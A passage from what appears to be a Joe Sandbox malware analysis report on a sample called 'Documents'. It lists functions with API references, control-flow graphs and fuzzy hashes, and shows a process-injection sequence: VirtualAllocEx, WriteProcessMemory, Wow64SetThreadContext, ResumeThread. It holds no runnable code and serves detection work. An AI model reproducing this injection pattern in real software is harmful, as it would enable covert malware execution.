                                                                          • Instruction Fuzzy Hash: 228145B0A04B058FD724DF29D1407AABBF5FF88300F148A6DE58ADBA50D775E849CB91
                                                                          Function 031F5DCC Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 581 31f5dcc-31f5dce 582 31f5dd5-31f5dd6 581->582 583 31f5dd0-31f5dd2 581->583 586 31f5ddd-31f5e99 CreateActCtxA 582->586 587 31f5dd8 582->587 584 31f5dd9-31f5ddc 583->584 585 31f5dd4 583->585 584->586 585->582 589 31f5e9b-31f5ea1 586->589 590 31f5ea2-31f5efc 586->590 587->584 589->590 597 31f5efe-31f5f01 590->597 598 31f5f0b-31f5f0f 590->598 597->598 599 31f5f11-31f5f1d 598->599 600 31f5f20 598->600 599->600 602 31f5f21 600->602 602->602
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 031F5E89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: bbbb8397d8bc7b4c362f4765f5f6934300242d53d3cf2d02fe008b4bb7375015
                                                                          • Instruction ID: c4bb3e4f99f771a8d57246ff140b5ef7cda263101e3f9f966dff9e8e66cc3be8
                                                                          • Opcode Fuzzy Hash: bbbb8397d8bc7b4c362f4765f5f6934300242d53d3cf2d02fe008b4bb7375015
                                                                          • Instruction Fuzzy Hash: 1141E2B0C00619CFDB24CFA9C844B8EFBB6BF4A304F20806AD508AB255DB756945CFA1
                                                                          Function 031F4544 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 603 31f4544-31f5e99 CreateActCtxA 608 31f5e9b-31f5ea1 603->608 609 31f5ea2-31f5efc 603->609 608->609 616 31f5efe-31f5f01 609->616 617 31f5f0b-31f5f0f 609->617 616->617 618 31f5f11-31f5f1d 617->618 619 31f5f20 617->619 618->619 621 31f5f21 619->621 621->621
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 031F5E89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 5767f22d82fb3e4f711ba791281230f6c49d8b0788f1ae2399881f31514096a0
                                                                          • Instruction ID: e6991fc57ca55ba0b61b62b61e527eec6f89c9584a75bb4a4447e6b700ad70bd
                                                                          • Opcode Fuzzy Hash: 5767f22d82fb3e4f711ba791281230f6c49d8b0788f1ae2399881f31514096a0
                                                                          • Instruction Fuzzy Hash: 8541FFB0C00619CFDB24CFA9C884B8EFBB6BF49304F24806AD508AB255DB716945CFA1
                                                                          Function 05F19A08 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 622 5f19a08-5f19a5e 625 5f19a60-5f19a6c 622->625 626 5f19a6e-5f19aad WriteProcessMemory 622->626 625->626 628 5f19ab6-5f19ae6 626->628 629 5f19aaf-5f19ab5 626->629 629->628
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F19AA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: f514d8914020f2172c6310882aa3fc831c60f1e69371972f666f303b6a113115
                                                                          • Instruction ID: 0484028443fdfa0bc390e37d4a0b91ff8b9e0eafe32b569a59b0cec24696c4b3
                                                                          • Opcode Fuzzy Hash: f514d8914020f2172c6310882aa3fc831c60f1e69371972f666f303b6a113115
                                                                          • Instruction Fuzzy Hash: 99218B75D003499FCB10CFA9C945BDEBBF4FF88310F108429E919A7240D7789945CBA5
                                                                          Function 05F19A10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 633 5f19a10-5f19a5e 635 5f19a60-5f19a6c 633->635 636 5f19a6e-5f19aad WriteProcessMemory 633->636 635->636 638 5f19ab6-5f19ae6 636->638 639 5f19aaf-5f19ab5 636->639 639->638
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F19AA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: f2441ebf32dff3ff31063b833a90e6084882074d6c0c91216d34f5530e612ab0
                                                                          • Instruction ID: 12160eead56926283b05a54e42005bb60a913454f4fb07c0bdf4b1f8acaf3d3c
                                                                          • Opcode Fuzzy Hash: f2441ebf32dff3ff31063b833a90e6084882074d6c0c91216d34f5530e612ab0
                                                                          • Instruction Fuzzy Hash: 18217AB5D003499FCB10CFAAC985BDEBBF4FF88310F108429E919A7240C7789954CBA5
                                                                          Function 05F19AF8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 643 5f19af8-5f19b8d ReadProcessMemory 647 5f19b96-5f19bc6 643->647 648 5f19b8f-5f19b95 643->648 648->647
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F19B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: bb2a13288dc19bdf15810343ad3cb1ebd5ec46543a6cd61d86815db9e02552c3
                                                                          • Instruction ID: 5131a131c6abe886956aca71c01ac8ccab6cf6481885e79a1e2400af8132c58c
                                                                          • Opcode Fuzzy Hash: bb2a13288dc19bdf15810343ad3cb1ebd5ec46543a6cd61d86815db9e02552c3
                                                                          • Instruction Fuzzy Hash: FC2139B1C003499FDB10DFAAC945AEEFBF4FF88310F108429E919A7240C7789940DBA1
                                                                          Function 05F19438 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 652 5f19438-5f1948b 654 5f1949b-5f194cb Wow64SetThreadContext 652->654 655 5f1948d-5f19499 652->655 657 5f194d4-5f19504 654->657 658 5f194cd-5f194d3 654->658 655->654 658->657
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F194BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 3f9f0f88cd64eeccb74e8cbcff8c2ee20987bb769909a833dfd6d1f0956f5ea8
                                                                          • Instruction ID: f26bc9c812daae05286e5b7c10fb26a5b1def41ecf081fa1f3ebfe6ff9edc61c
                                                                          • Opcode Fuzzy Hash: 3f9f0f88cd64eeccb74e8cbcff8c2ee20987bb769909a833dfd6d1f0956f5ea8
                                                                          • Instruction Fuzzy Hash: D5213975D002098FDB10DFA9C5857EEBBF4EB89314F14842AD459A7240C7789945CFA5
                                                                          Function 031FD308 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 662 31fd308-31fd83c DuplicateHandle 665 31fd83e-31fd844 662->665 666 31fd845-31fd862 662->666 665->666
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031FD76E,?,?,?,?,?), ref: 031FD82F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: d55a6104fc42abe398e333b456fe3c3c6448733ae7147ddaca0572dd46bf7fe3
                                                                          • Instruction ID: 683ad07214abec473a238f5e198967ef82f962c22a3d5779343ab9a564f32ed7
                                                                          • Opcode Fuzzy Hash: d55a6104fc42abe398e333b456fe3c3c6448733ae7147ddaca0572dd46bf7fe3
                                                                          • Instruction Fuzzy Hash: 8B21C3B5D002499FDB10CF99D584AEEFBF4EB48310F14842AE918A7250D375A954CFA1
                                                                          Function 031FD7A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031FD76E,?,?,?,?,?), ref: 031FD82F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 97da5f793899ebb8a3056accc4079edbb3d8337f2a5555c7159a28f108d006c9
                                                                          • Instruction ID: af8c58434dc7308a0c6ea79c5bb338395b9c14abf5b40fba7ab25866fac462c5
                                                                          • Opcode Fuzzy Hash: 97da5f793899ebb8a3056accc4079edbb3d8337f2a5555c7159a28f108d006c9
                                                                          • Instruction Fuzzy Hash: 7121E5B5D00249AFDB10CF99D584AEEBFF4FB48310F14841AE918B7250D375A944CF61
                                                                          Function 05F19440 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F194BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: a3a7c4a8e67e62fe5fc072dfc409e1df24c7da752aba4b18b9517cbf2535964c
                                                                          • Instruction ID: b8751a6403c468db453b058ddd7b68a7fc9289949710e642e72eac8e671e23f7
                                                                          • Opcode Fuzzy Hash: a3a7c4a8e67e62fe5fc072dfc409e1df24c7da752aba4b18b9517cbf2535964c
                                                                          • Instruction Fuzzy Hash: 61213875D003098FDB10DFAAC5857EEBBF4EF88324F10842AD819A7240C7789945CFA5
                                                                          Function 05F19B00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F19B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: d61695277ad90b553acfb17ca12d634757b7cb4f3a3352737cf080d647c41d2a
                                                                          • Instruction ID: acf088c96ce58bc343407b4379d3aa6e2d3440de9ca697b2e3a68eeea0bb1c0b
                                                                          • Opcode Fuzzy Hash: d61695277ad90b553acfb17ca12d634757b7cb4f3a3352737cf080d647c41d2a
                                                                          • Instruction Fuzzy Hash: 9B2128B1C003499FCB10DFAAC945AEEBBF5FF88320F108429E919A7240C7789940DBA5
                                                                          Function 05F19948 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F199BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 39f4552f0145b6cfbd3e83bf2556f2c0767d90d6dbd0ca61664c103a5876cd28
                                                                          • Instruction ID: 9317157dc150b90820876d764047cb76776d677f4dcae7a7aa0c88bc81784412
                                                                          • Opcode Fuzzy Hash: 39f4552f0145b6cfbd3e83bf2556f2c0767d90d6dbd0ca61664c103a5876cd28
                                                                          • Instruction Fuzzy Hash: 4F118975C002499FCB10DFA9C845BDEBFF5EF88324F108819E919A7250C779A940CFA1
                                                                          Function 05F19950 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F199BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: c8306686f2301e1b94f9c34288b4338db533ff72cd8e073593ca3f6e0f5a493a
                                                                          • Instruction ID: 9395262d866986c6c65d7c83aa7995e57cebbbff36c6360fe6d3f0890a5b46bd
                                                                          • Opcode Fuzzy Hash: c8306686f2301e1b94f9c34288b4338db533ff72cd8e073593ca3f6e0f5a493a
                                                                          • Instruction Fuzzy Hash: B7113775D002499FCB10DFAAC945AEFBFF5EF88324F108419E91AA7250C779A940DFA1
                                                                          Function 05F19388 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 06cfc1dd57d763e866415b46a1be71889850c3423f9878e95ce2029671ee9219
                                                                          • Instruction ID: 262c338b9f3402cf148fa5868c0ed06952794ab97da4cf15ae303f71a8eab1aa
                                                                          • Opcode Fuzzy Hash: 06cfc1dd57d763e866415b46a1be71889850c3423f9878e95ce2029671ee9219
                                                                          • Instruction Fuzzy Hash: BE1158B5D002498FDB20DFAAC5497EFFBF8EB88320F208419D519B7240CB796941CBA5
                                                                          Function 05F19390 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: bdc7e58529d37698d80f608cc5caa862f443a6a2c33f7c8f0813ded91030bcf3
                                                                          • Instruction ID: 98390f37b13b4ed1f2b197aba7381f079af00a6dfdc32de2c5eec41509928a61
                                                                          • Opcode Fuzzy Hash: bdc7e58529d37698d80f608cc5caa862f443a6a2c33f7c8f0813ded91030bcf3
                                                                          • Instruction Fuzzy Hash: 4F113AB5D003498FDB20DFAAC5457DFFBF8EB88324F248419D519A7240C7796944CBA5
                                                                          Function 031FB4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB51E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: f3dd16bc62a1d3e46b73341368605d1a76c3dc7979d233ec37a3fadcf88a6994
                                                                          • Instruction ID: dc3745cd5bd70855a213980e822e22b85a2017d8bec58b2b76e1dd1db4baa9ad
                                                                          • Opcode Fuzzy Hash: f3dd16bc62a1d3e46b73341368605d1a76c3dc7979d233ec37a3fadcf88a6994
                                                                          • Instruction Fuzzy Hash: E511E0B5C012498FCB10CF9AD544AEEFBF4EB88314F14845AD929B7250D379A545CFA1
                                                                          Function 05F1E108 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 05F1E16D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: beaa11b5ef402255a0b3ec0bf661c872180357a1aab55bcb3f55f0a5b1b744f9
                                                                          • Instruction ID: bbed74c0920857746c6a83e5a2df140c838faff744ee8c91340cfb52d96f1e06
                                                                          • Opcode Fuzzy Hash: beaa11b5ef402255a0b3ec0bf661c872180357a1aab55bcb3f55f0a5b1b744f9
                                                                          • Instruction Fuzzy Hash: BE11F2B58003499FCB10DF9AD849BDEBBF8FB48320F148419E919B7240C379A984CFA5
                                                                          Function 05F1E141 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 05F1E16D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 9a1ada6d187f9a7f9235301c537c3e73279a7f8c416b25a5ccc0a2969829e404
                                                                          • Instruction ID: dd5a4787c9d5325b3f35a3eeb93fe6e0e38c28e47349fdb2b53bdabed068d2b5
                                                                          • Opcode Fuzzy Hash: 9a1ada6d187f9a7f9235301c537c3e73279a7f8c416b25a5ccc0a2969829e404
                                                                          • Instruction Fuzzy Hash: 85F0E7B59003099FDB10DF89D844BDEBBF8FB48314F14841AE959A7210C379A594CFA1
                                                                          Function 0306D4C4 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd898941eca4755c4078a8983549101955970bae4313f5f0f51e10939a0671f3
                                                                          • Instruction ID: 08f9285809d47d7aac13f83da5410480c3346b4d044344c9dd72ad227ed7550c
                                                                          • Opcode Fuzzy Hash: cd898941eca4755c4078a8983549101955970bae4313f5f0f51e10939a0671f3
                                                                          • Instruction Fuzzy Hash: 642137B1605240DFDB05DF14D9C0F2ABFA5FBC8318F28C5A9E8090B65AC336D456CBA1
                                                                          Function 0307D1D4 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 980e5a60dfb164d0a39f7f372bf1c70e1de426fe641f1bf481842f5cb2b9f330
                                                                          • Instruction ID: 71f7652cc2059633110c5a6f4dee0c819724c0b38ca31fe2eaba6e9b36f2bb17
                                                                          • Opcode Fuzzy Hash: 980e5a60dfb164d0a39f7f372bf1c70e1de426fe641f1bf481842f5cb2b9f330
                                                                          • Instruction Fuzzy Hash: F02126B1A04200EFDB05DF14D9C0B2ABBA5FF94314F28C9ADED4A4B252C336D407CA65
                                                                          Function 0307D01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: feb428a29d34c076c782554eebe97ea8e80e89c9549f054f195e91651cc99c99
                                                                          • Instruction ID: 01b6753aa2af0c20869310ab5ec8f91ab6669f27511af3c729a726497d306126
                                                                          • Opcode Fuzzy Hash: feb428a29d34c076c782554eebe97ea8e80e89c9549f054f195e91651cc99c99
                                                                          • Instruction Fuzzy Hash: B12104B5A04240DFDB14DF14D9C4B2ABBA5FF84314F28C9ADD90A4B246C33AD417CAA5
                                                                          Function 0307D006 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 434d62670bcd680dc89d813ee6d41063904e893405cfc1674c45d1081513f7f2
                                                                          • Instruction ID: 3333aa689e990c23943e0dc5a6841a3b6b966738e443055e453d1e8f57a5132d
                                                                          • Opcode Fuzzy Hash: 434d62670bcd680dc89d813ee6d41063904e893405cfc1674c45d1081513f7f2
                                                                          • Instruction Fuzzy Hash: 062184755093808FDB12CF24D994715BFB1EF46214F28C5DAD8498F6A7C33AD41ACBA2
                                                                          Function 0306D4BF Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: f1f146a06dd4413577a8806be9acf06448638d28c421ae104c69be7674bc8503
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 3C11E676905280CFCB16CF14D5D4B16BFB1FB84314F28C6A9D8490B65AC336D45ACBA1
                                                                          Function 0307D1CF Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction ID: 0361c625743e144f2e69937dd4012b1ddc4c0dddb5471ff7c0f695d4707656a8
                                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction Fuzzy Hash: 0F11B875904280DFCB02CF10D5C4B15FBA2FF84224F28C6AAD8494B6A6C33AD40BCB62
                                                                          Function 0306D731 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74949bd16f816552d0866b3a715bcd9add8e1cced85dda6094096a00307dade8
                                                                          • Instruction ID: 349b99669cfb45adb514ff1a4b4bc91711c3f9736e1bd6eb7bf6b60a4505c323
                                                                          • Opcode Fuzzy Hash: 74949bd16f816552d0866b3a715bcd9add8e1cced85dda6094096a00307dade8
                                                                          • Instruction Fuzzy Hash: 7801DB716063449AE710CE25DDC476BFFD8DF45324F1CC86AED095A18AE3799844C6B2
                                                                          Function 0306D730 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cbd2685bd63e78912f73a7304185d4eb556e5468c00efb7cbe6f8e280ebbca0
                                                                          • Instruction ID: 940ac44aad228095e9e5a81f84a95833e2fc37065c5f9091e851807364b92f97
                                                                          • Opcode Fuzzy Hash: 1cbd2685bd63e78912f73a7304185d4eb556e5468c00efb7cbe6f8e280ebbca0
                                                                          • Instruction Fuzzy Hash: F1F0CD72505344AEE7108A1ACD88B67FFE8EB85334F18C45AED081E28AD3799844CAB1

                                                                          Non-executed Functions

                                                                          Function 05F19518 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0830ca777628f44c044f736460cd598124d884c8ffb5acf9c9dd47b034f4e2b
                                                                          • Instruction ID: 8846f232bb812c7a6340e49bde48bf16d371718910acebf83a5092e490c5de9e
                                                                          • Opcode Fuzzy Hash: a0830ca777628f44c044f736460cd598124d884c8ffb5acf9c9dd47b034f4e2b
                                                                          • Instruction Fuzzy Hash: 7EE116B4E142198FCB14DFA9C5909AEFBF2FF88301F248169D815AB315D734A942CFA5
                                                                          Function 05F17490 Relevance: .3, Instructions: 312COMMON
